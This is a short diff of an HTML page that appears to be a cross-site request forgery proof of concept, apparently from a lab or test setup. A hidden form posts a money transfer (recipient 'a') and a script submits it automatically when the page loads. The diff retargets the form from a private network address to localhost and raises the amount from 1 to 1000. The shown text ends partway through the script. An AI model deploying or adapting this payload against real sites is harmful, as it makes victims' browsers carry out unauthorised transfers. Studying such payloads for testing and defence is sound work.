--- a/index.html
+++ b/index.html
@@ -1,8 +1,8 @@
 <html>
 <body>
-<form action="https://192.168.2.199:55402/transfer" method="POST">
+<form action="http://127.0.0.1:8080/transfer" method="POST">
  <input type="hidden" name="user_to" value="a" />
- <input type="hidden" name="amount" value="1" />
+ <input type="hidden" name="amount" value="1000" />
  </form>
  <script>
 	document.forms[0].submit();
